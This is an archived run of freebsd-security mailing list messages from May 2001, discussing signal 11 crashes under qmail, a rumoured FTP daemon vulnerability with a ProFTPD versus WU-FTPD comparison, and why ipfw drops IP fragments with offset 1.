Veldhouse" , Subject: RE: Qmail + FreeBSD 4.3 Date: Tue, 22 May 2001 16:31:48 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <008701c0e2c1$4d3f6660$3028680a@tgt.com> X-MimeOLE: Produced By Microsoft MimeOLE V5.00.3018.1300 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Well bad hardware is less likely than its trying to overwrite memory it doesn't own. If he is being attacked, and it is a buffer overflow exploit, than overwriting memory it doesn't own is more likely than it being repeatidly hardware, especially after his system has been working fine all this time. -----Original Message----- From: Thomas T. Veldhouse [mailto:veldy@veldy.net] Sent: Tuesday, May 22, 2001 9:16 AM To: Michael Tang Helmeste Subject: Re: Qmail + FreeBSD 4.3 Signal 11 (and often10) very often signal bad hardware. Memory and/or CPU are usually the cause, followed by the main board. Corruption occurs in memory and a signal 11 results. Tom Veldhouse veldy@veldy.net ----- Original Message ----- From: "Michael Tang Helmeste" To: Sent: Monday, May 21, 2001 8:35 PM Subject: RE: Qmail + FreeBSD 4.3 > actually it just means segmentation fault > > it happens when a program accesses some memory that it doesn't own > > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Olivier Nicole > Sent: Monday, May 21, 2001 9:17 PM > To: subscribed@de-net.org > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: Qmail + FreeBSD 4.3 > > > Hi Dan, > > Signa 11 often denotes some hardware problem I guess, something like > overheating. > > Olivier > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 13:36:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from veldy.net (w028.z064001117.msp-mn.dsl.cnc.net [64.1.117.28]) by hub.freebsd.org (Postfix) with ESMTP id 53A1837B43C for ; Tue, 22 May 2001 13:36:48 -0700 (PDT) (envelope-from veldy@veldy.net) Received: from HP2500B (fuggle.veldy.net [64.1.117.28]) by veldy.net (Postfix) with SMTP id 48ACCBAA7; Tue, 22 May 2001 15:36:47 -0500 (CDT) Message-ID: <019b01c0e2fe$eb384d40$3028680a@tgt.com> From: "Thomas T. Veldhouse" To: "Michael Tang Helmeste" , References: Subject: Re: Qmail + FreeBSD 4.3 Date: Tue, 22 May 2001 15:36:45 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Swap memory and see. I had the same problem (different program). Apache kept dying was my first symptom. Then postfix died occassionally. MySQL dumped when used. A few things like that. It started happening on a system that had been working for the better part of a year. It was the CPU. Sig 11 more often than not is a hardware problem. There is only one case I know of that I can reproducibly create a sig 11 when it is not hardware. If you run ncftp3 against a server and download a large directory using the "tar on the fly option", it will often dump core. This could be the case with qmail, but I have not seen it reported, thus I think he should check his hardware. Tom Veldhouse ----- Original Message ----- From: "Michael Tang Helmeste" To: "Thomas T. Veldhouse" ; Sent: Tuesday, May 22, 2001 3:31 PM Subject: RE: Qmail + FreeBSD 4.3 > Well bad hardware is less likely than its trying to overwrite memory it > doesn't own. If he is being attacked, and it is a buffer overflow exploit, > than overwriting memory it doesn't own is more likely than it being > repeatidly hardware, especially after his system has been working fine all > this time. > > -----Original Message----- > From: Thomas T. Veldhouse [mailto:veldy@veldy.net] > Sent: Tuesday, May 22, 2001 9:16 AM > To: Michael Tang Helmeste > Subject: Re: Qmail + FreeBSD 4.3 > > > Signal 11 (and often10) very often signal bad hardware. Memory and/or CPU > are usually the cause, followed by the main board. Corruption occurs in > memory and a signal 11 results. > > Tom Veldhouse > veldy@veldy.net > > ----- Original Message ----- > From: "Michael Tang Helmeste" > To: > Sent: Monday, May 21, 2001 8:35 PM > Subject: RE: Qmail + FreeBSD 4.3 > > > > actually it just means segmentation fault > > > > it happens when a program accesses some memory that it doesn't own > > > > -----Original Message----- > > From: owner-freebsd-security@FreeBSD.ORG > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Olivier Nicole > > Sent: Monday, May 21, 2001 9:17 PM > > To: subscribed@de-net.org > > Cc: freebsd-security@FreeBSD.ORG > > Subject: Re: Qmail + FreeBSD 4.3 > > > > > > Hi Dan, > > > > Signa 11 often denotes some hardware problem I guess, something like > > overheating. > > > > Olivier > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 14: 9:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from thedarkside.nl (cc31301-a.assen1.dr.nl.home.com [212.120.71.246]) by hub.freebsd.org (Postfix) with ESMTP id 6C2CC37B422; Tue, 22 May 2001 14:09:31 -0700 (PDT) (envelope-from serkoon@thedarkside.nl) Received: from kilmarnock (kilmarnock [10.0.0.2]) by thedarkside.nl (8.11.3/8.9.3) with SMTP id f4ML9RV45113; Tue, 22 May 2001 23:09:28 +0200 (CEST) (envelope-from serkoon@thedarkside.nl) Message-ID: <002f01c0e303$cb86ccb0$0200000a@kilmarnock> From: "serkoon" To: "Mike" , Cc: References: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin> <003601c0e2ee$b006bfa0$0700a8c0@com.home.com> Subject: Re: Is there a ftp vuln in 4.3-STABLE Date: Tue, 22 May 2001 23:11:39 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I don't know what the mess below all means, but what I do know is that there were some warez-kids who put some nice warez on your ftp or were going to. (they tend to 'tag' an ftp first, to fill it up afterwards). > 1mbtest.ptf > ???? Tagged By Wizardz Fxp ???? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 14:51:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from alpha.netvision.net.il (alpha.netvision.net.il [194.90.1.13]) by hub.freebsd.org (Postfix) with ESMTP id 584B737B424 for ; Tue, 22 May 2001 14:51:20 -0700 (PDT) (envelope-from lirandb@netvision.net.il) Received: from a ([213.57.143.184]) by alpha.netvision.net.il (8.9.3/8.8.6) with SMTP id AAA30064 for ; Wed, 23 May 2001 00:51:17 +0300 (IDT) Message-ID: <003a01c0e311$63421c00$b88f39d5@a> From: "Retal" To: References: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin> <003601c0e2ee$b006bfa0$0700a8c0@com.home.com> <002f01c0e303$cb86ccb0$0200000a@kilmarnock> Subject: Re: Is there a ftp vuln in 4.3-STABLE Date: Wed, 23 May 2001 00:48:58 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6600 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org My guess, this happened to you because a mistaken chmod, like perhaps you chmoded one of the following directories into the FTP directory for writing? You should it. -Liran Dahan (lirandb@netvision.net.il, retal@retal.co.il) ----- Original Message ----- From: "serkoon" To: "Mike" ; Cc: Sent: Tuesday, May 22, 2001 11:11 PM Subject: Re: Is there a ftp vuln in 4.3-STABLE > I don't know what the mess below all means, but what I do know is > that there were some warez-kids who put some nice warez on your > ftp or were going to. (they tend to 'tag' an ftp first, to fill it up > afterwards). > > > 1mbtest.ptf > > ???? Tagged By Wizardz Fxp ???? > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 17:15:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from mta5.rcsntx.swbell.net (mta5.rcsntx.swbell.net [151.164.30.29]) by hub.freebsd.org (Postfix) with ESMTP id B10C637B424 for ; Tue, 22 May 2001 17:15:47 -0700 (PDT) (envelope-from ryanpek@swbell.net) Received: from mhx800 ([64.219.216.69]) by mta5.rcsntx.swbell.net (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with SMTP id <0GDR00FTTFRTRD@mta5.rcsntx.swbell.net> for freebsd-security@freebsd.org; Tue, 22 May 2001 18:26:18 -0500 (CDT) Date: Tue, 22 May 2001 18:25:30 -0500 From: Ryan Subject: Re: Is there a ftp vuln in 4.3-STABLE To: freebsd-security@freebsd.org Message-id: <000501c0e316$7deb4450$45d8db40@mhx800> MIME-version: 1.0 X-Mailer: Microsoft Outlook Express 5.50.4522.1200 Content-type: text/plain; charset="iso-8859-1" Content-transfer-encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 References: <005301c0e2b7$8a4a6dc0$0245a8c0@chojin> <003601c0e2ee$b006bfa0$0700a8c0@com.home.com> <002f01c0e303$cb86ccb0$0200000a@kilmarnock> <003a01c0e311$63421c00$b88f39d5@a> X-Priority: 3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org There is an ftp vuln... I do not have any details on it sorry.. Some kinda overflow.. I would run proftpd ----- Original Message ----- From: "Retal" To: Sent: Tuesday, May 22, 2001 5:48 PM Subject: Re: Is there a ftp vuln in 4.3-STABLE > My guess, this happened to you because a mistaken chmod, like perhaps you > chmoded one of the following directories into the FTP directory for writing? > You should it. > > -Liran Dahan (lirandb@netvision.net.il, retal@retal.co.il) > > ----- Original Message ----- > From: "serkoon" > To: "Mike" ; > Cc: > Sent: Tuesday, May 22, 2001 11:11 PM > Subject: Re: Is there a ftp vuln in 4.3-STABLE > > > > I don't know what the mess below all means, but what I do know is > > that there were some warez-kids who put some nice warez on your > > ftp or were going to. (they tend to 'tag' an ftp first, to fill it up > > afterwards). > > > > > 1mbtest.ptf > > > ???? Tagged By Wizardz Fxp ???? > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 17:26:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from magnetar.blackhatnetworks.com (magnetar.blackhatnetworks.com [65.166.202.3]) by hub.freebsd.org (Postfix) with ESMTP id EF89037B42C for ; Tue, 22 May 2001 17:26:39 -0700 (PDT) (envelope-from alex@nixfreak.org) Received: from localhost (alex@localhost.blackhatnetworks.com [127.0.0.1]) by magnetar.blackhatnetworks.com (8.x/8.x) with ESMTP id f4N0QTt09515; Tue, 22 May 2001 20:26:29 -0400 (EDT) Date: Tue, 22 May 2001 20:26:29 -0400 (EDT) From: Alex X-X-Sender: To: Ryan Cc: Subject: Re: Is there a ftp vuln in 4.3-STABLE In-Reply-To: <000501c0e316$7deb4450$45d8db40@mhx800> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Is this a FreeBSD specific FTP vulnerability? -Alex On Tue, 22 May 2001, Ryan wrote: > There is an ftp vuln... I do not have any details on it sorry.. Some kinda > overflow.. I would run proftpd > > > ----- Original Message ----- > From: "Retal" > To: > Sent: Tuesday, May 22, 2001 5:48 PM > Subject: Re: Is there a ftp vuln in 4.3-STABLE > > > > My guess, this happened to you because a mistaken chmod, like perhaps you > > chmoded one of the following directories into the FTP directory for > writing? > > You should it. > > > > -Liran Dahan (lirandb@netvision.net.il, retal@retal.co.il) > > > > ----- Original Message ----- > > From: "serkoon" > > To: "Mike" ; > > Cc: > > Sent: Tuesday, May 22, 2001 11:11 PM > > Subject: Re: Is there a ftp vuln in 4.3-STABLE > > > > > > > I don't know what the mess below all means, but what I do know is > > > that there were some warez-kids who put some nice warez on your > > > ftp or were going to. (they tend to 'tag' an ftp first, to fill it up > > > afterwards). > > > > > > > 1mbtest.ptf > > > > ???? Tagged By Wizardz Fxp ???? > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > with "unsubscribe freebsd-security" in the body of the message > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 17:53:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id D37C037B43C for ; Tue, 22 May 2001 17:53:16 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GDRJS500.M5N; Tue, 22 May 2001 17:52:53 -0700 Message-ID: <3B0B09F9.1825BEC4@globalstar.com> Date: Tue, 22 May 2001 17:53:13 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Lowell Gilbert Cc: freebsd-security@FreeBSD.ORG Subject: Re: IPFW Rule -1 Always = Attack? References: <44y9rtf9ox.fsf@lowellg.ne.mediaone.net> <44ae4669z0.fsf@lowellg.ne.mediaone.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Lowell Gilbert wrote: > > diman@asd-g.com (diman) writes: > > > On 19 May 2001, Lowell Gilbert wrote: > > > > > dwplists@loop.com (D. W. Piper) writes: > > > > > > > If I understand things correctly from the archives and the IPFW man > > > > page, IPFW rule -1 is built into the firewall, and only applies to > > > > rejecting IP fragments with a fragment offset of one. The man page > > > > further states, "This is a valid packet, but it only has one use, to try > > > > to circumvent firewalls." > > > > > > > > Does that mean that every packet dropped by rule -1 indicates a > > > > deliberate attempt to circumvent the firewall, and should be reported to > > > > the appropriate network administrator for the source IP address? > > > > > > It's *possible* that the rule could be triggered by something that > > > wasn't an attack. Thinking about it briefly, it seems slightly more > > > likely that it's part of a probe, rather than an actual attack > > > However, reporting to the network administrator for that address is > > > almost certainly useless in any case, because an attacker would > > > probably have spoofed that address anyway. [An attacker wouldn't ever > > > get any response from that packet in any case.] > > > > Attacker can get answer from a destination host. It's a ipfw between > > if he willn't. Easy rule :) > > This is incorrect. The attacker can't get an answer in either case. > > The destination host won't reply unless the packet with the fragment > offset of zero *also* got through to that destination host, in which > case this rule doesn't matter. Huh? It sure does. If the first packet gets through, the second one is stopped, thus preventing all pieces from reaching the destination host and being reassembled. > If it isn't the case, the destination > host will never get a whole packet, and will never respond. > > The "rule -1" situation is only useful (to attackers) as part of a > traffic analysis scheme, and not terribly even for that. However, > there's no downside to dropping these packets, so we do. No, the use of these packets is to try to slip datagrams past a firewall. If a datagram containing a TCP segment is fragmented with an offset of 1 (8 bytes), the source and destination ports and the sequence number are in the first fragment, but the TCP flags will end up in the second fragment. This could potentially confuse a firewall that does not reassemble fragments (like ipfw(8)). The firewall has no TCP flags to check on that first fragment, so what does it do? In a stateless packet filter, how can you tell if a packet is part of an established connection without checking the flags? Well, ipfw(8) has been designed to not be concerned since it just drops that second fragment. See RFC1858 for a more complete discussion. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 17:58:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from cs4.cs.ait.ac.th (cs4.cs.ait.ac.th [192.41.170.16]) by hub.freebsd.org (Postfix) with ESMTP id C1F5337B43C for ; Tue, 22 May 2001 17:58:33 -0700 (PDT) (envelope-from on@cs.ait.ac.th) Received: from banyan.cs.ait.ac.th (on@banyan.cs.ait.ac.th [192.41.170.5]) by cs4.cs.ait.ac.th (8.9.3/8.9.3) with ESMTP id HAA09785; Wed, 23 May 2001 07:55:35 +0700 (GMT+0700) Received: (from on@localhost) by banyan.cs.ait.ac.th (8.8.5/8.8.5) id HAA13422; Wed, 23 May 2001 07:58:31 +0700 (ICT) Date: Wed, 23 May 2001 07:58:31 +0700 (ICT) Message-Id: <200105230058.HAA13422@banyan.cs.ait.ac.th> X-Authentication-Warning: banyan.cs.ait.ac.th: on set sender to on@banyan.cs.ait.ac.th using -f From: Olivier Nicole To: veldy@veldy.net Cc: glassfish@frogbox.dyndns.org, freebsd-security@FreeBSD.ORG In-reply-to: <019b01c0e2fe$eb384d40$3028680a@tgt.com> (veldy@veldy.net) Subject: Re: Qmail + FreeBSD 4.3 References: <019b01c0e2fe$eb384d40$3028680a@tgt.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, As a good rule, hardware fails in the first hour after turning the power on for the first time, or it will fails some months/years later. Like anything, hardware do wear off, let say your CPU fan lightly slow down, it means CPU heat increase. Memory and card connectors are submitted to vibrations, even if not perceptible to human, so the contacts get oxyded (sp?). Examples could be multiple, it is not just disk mortors that fails. Best regards, olivier > Well bad hardware is less likely than its trying to overwrite memory it > doesn't own. If he is being attacked, and it is a buffer overflow exploit, > than overwriting memory it doesn't own is more likely than it being > repeatidly hardware, especially after his system has been working fine all > this time. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 18: 8:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id B38B337B424 for ; Tue, 22 May 2001 18:08:31 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GDRKHK00.M5Q; Tue, 22 May 2001 18:08:08 -0700 Message-ID: <3B0B0D8C.3ADA76C1@globalstar.com> Date: Tue, 22 May 2001 18:08:28 -0700 From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: diman Cc: Lowell Gilbert , freebsd-security@FreeBSD.ORG Subject: Re: IPFW Rule -1 Always = Attack? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org diman wrote: [snip] > It might be 'icmp: reassembly time exceed' or something else - it's > OS/Setup dependant. It might need more than 1 packet, but my point > is: "rule -1" can be used for ipfw detection/identification. > There are no much security risk unless u wanna hide ur frierwall from > peoples looks. I cannot say for sure, but I would expect that there are many firewall implementations that drop these kinds of fragments unconditionally. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 18:21:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.islandnet.com (mail.islandnet.com [199.175.106.4]) by hub.freebsd.org (Postfix) with ESMTP id 6097237B424 for ; Tue, 22 May 2001 18:21:47 -0700 (PDT) (envelope-from rb@islandnet.com) Received: from [199.175.106.243] (helo=newwilly.islandnet.com) by mail.islandnet.com with SMTP id 152NLO-000I7g-00 for freebsd-security@freebsd.org; Tue, 22 May 2001 18:21:46 -0700 Content-Type: text/plain; charset="iso-8859-1" From: Ron Brogden Reply-To: rb@islandnet.com Organization: Islandnet.com To: freebsd-security@freebsd.org Subject: Re: Is there a ftp vuln in 4.3-STABLE Date: Tue, 22 May 2001 18:18:10 +0000 X-Mailer: KMail [version 1.2] References: <000501c0e316$7deb4450$45d8db40@mhx800> <0105221816290I.13659@newwilly.islandnet.com> In-Reply-To: <0105221816290I.13659@newwilly.islandnet.com> MIME-Version: 1.0 Message-Id: <0105221818100J.13659@newwilly.islandnet.com> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tuesday 22 May 2001 18:16, you wrote: > On Tuesday 22 May 2001 23:25, you wrote: > > There is an ftp vuln... I do not have any details on it sorry.. Some > > kinda overflow.. I would run proftpd Care to back this up with some data? From all I have seen on the issue, ProFTPD has suffered about as many showstoppers as WU-FTPD. I am not claiming that WU-FTPD is necessarily better, just that I see it as no worse and it is definitely not an immediate "solution" to security hassles. It is *not* like comparing IIS to Apache (since Apache suffers way less security problems in the codebase), more like comparing Netscape (Iplanet) to IIS. =) In the Bugtraq Archives there are 12 vulnerability postings for WU-FTPD and 8 for ProFTPD. Of the WU-FTPD ones, one is not actually in WU-FTPD and a couple more are ancient. Also, a bunch are really just the same issue from different vendors. Of the ProFTPD issues, there is a DOS as well as buffer overflows, format strings, etc. Nothing there suggests it has an even remotely better security record. I cringe when I see people suggest that ProFTPD is more secure because the facts do not bear it out and I fear it gives folks a false sense of security. IMHO of course. Cheers, Ron -- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 18:34: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from euphoria.digitalextreme.org (euphoria.digitalextreme.org [204.212.149.31]) by hub.freebsd.org (Postfix) with SMTP id 788CC37B424 for ; Tue, 22 May 2001 18:34:01 -0700 (PDT) (envelope-from subscribed@de-net.org) Received: (qmail 12552 invoked by uid 504); 22 May 2001 18:29:31 -0000 Received: from unknown (HELO extremist) (204.212.149.57) by euphoria.digitalextreme.org with SMTP; 22 May 2001 18:29:31 -0000 From: "Dan Graaff" To: "Thomas T. Veldhouse" , "Michael Tang Helmeste" , Subject: RE: Qmail + FreeBSD 4.3 Date: Tue, 22 May 2001 18:33:10 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 In-Reply-To: <019b01c0e2fe$eb384d40$3028680a@tgt.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The interesting thing is, I have a CGI script that I wrote that does this, on every server I run it on.. it runs fine, but then when it exits, it exits error 11... nobody notices, and i never fixed it.. but im thinking it isnt a RAM issue... if it were, the evil RAM god would not only pick ONE process to haunt. In the past when I had RAM problems, it would kill a process at random... usually the most demanding process... vdelivermail shouldnt be that demanding.. i mean its a child process!! -Dan Graaff / Digital The DE-Network -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Thomas T. Veldhouse Sent: Tuesday, May 22, 2001 1:37 PM To: Michael Tang Helmeste; freebsd-security@freebsd.org Subject: Re: Qmail + FreeBSD 4.3 Swap memory and see. I had the same problem (different program). Apache kept dying was my first symptom. Then postfix died occassionally. MySQL dumped when used. A few things like that. It started happening on a system that had been working for the better part of a year. It was the CPU. Sig 11 more often than not is a hardware problem. There is only one case I know of that I can reproducibly create a sig 11 when it is not hardware. If you run ncftp3 against a server and download a large directory using the "tar on the fly option", it will often dump core. This could be the case with qmail, but I have not seen it reported, thus I think he should check his hardware. Tom Veldhouse ----- Original Message ----- From: "Michael Tang Helmeste" To: "Thomas T. Veldhouse" ; Sent: Tuesday, May 22, 2001 3:31 PM Subject: RE: Qmail + FreeBSD 4.3 > Well bad hardware is less likely than its trying to overwrite memory it > doesn't own. If he is being attacked, and it is a buffer overflow exploit, > than overwriting memory it doesn't own is more likely than it being > repeatidly hardware, especially after his system has been working fine all > this time. > > -----Original Message----- > From: Thomas T. Veldhouse [mailto:veldy@veldy.net] > Sent: Tuesday, May 22, 2001 9:16 AM > To: Michael Tang Helmeste > Subject: Re: Qmail + FreeBSD 4.3 > > > Signal 11 (and often10) very often signal bad hardware. Memory and/or CPU > are usually the cause, followed by the main board. Corruption occurs in > memory and a signal 11 results. > > Tom Veldhouse > veldy@veldy.net > > ----- Original Message ----- > From: "Michael Tang Helmeste" > To: > Sent: Monday, May 21, 2001 8:35 PM > Subject: RE: Qmail + FreeBSD 4.3 > > > > actually it just means segmentation fault > > > > it happens when a program accesses some memory that it doesn't own > > > > -----Original Message----- > > From: owner-freebsd-security@FreeBSD.ORG > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Olivier Nicole > > Sent: Monday, May 21, 2001 9:17 PM > > To: subscribed@de-net.org > > Cc: freebsd-security@FreeBSD.ORG > > Subject: Re: Qmail + FreeBSD 4.3 > > > > > > Hi Dan, > > > > Signa 11 often denotes some hardware problem I guess, something like > > overheating. > > > > Olivier > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 22 18:36:52 2001 Delivered-To: freebsd-security@freebsd.org Received: from mta4.rcsntx.swbell.net (mta4.rcsntx.swbell.net [151.164.30.28]) by hub.freebsd.org (Postfix) with ESMTP id 2809437B424 for ; Tue, 22 May 2001 18:36:49 -0700 (PDT) (envelope-from ryanpek@swbell.net) Received: from mhx800 ([64.219.216.69]) by mta4.rcsntx.swbell.net (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with SMTP id <0GDR00FI5LQ5MN@mta4.rcsntx.swbell.net> for freebsd-security@freebsd.org; Tue, 22 May 2001 20:34:53 -0500 (CDT) Date: Tue, 22 May 2001 20:31:20 -0500 From: Ryan Subject: Re: Is there a ftp vuln in 4.3-STABLE To: freebsd-security@freebsd.org Message-id: <001d01c0e328$120701e0$45d8db40@mhx800> MIME-version: 1.0 X-Mailer: Microsoft Outlook Express 5.50.4522.1200 Content-type: text/plain; charset="iso-8859-1" Content-transfer-encoding: 7bit X-MSMail-Priority: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 References: X-Priority: 3 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I was just informed from ppl i know.. And all i get is its privite.. if i had it i would share.. sorry ryan ----- Original Message ----- From: "Alex" To: "Ryan" Cc: Sent: Tuesday, May 22, 2001 7:26 PM Subject: Re: Is there a ftp vuln in 4.3-STABLE > Is this a 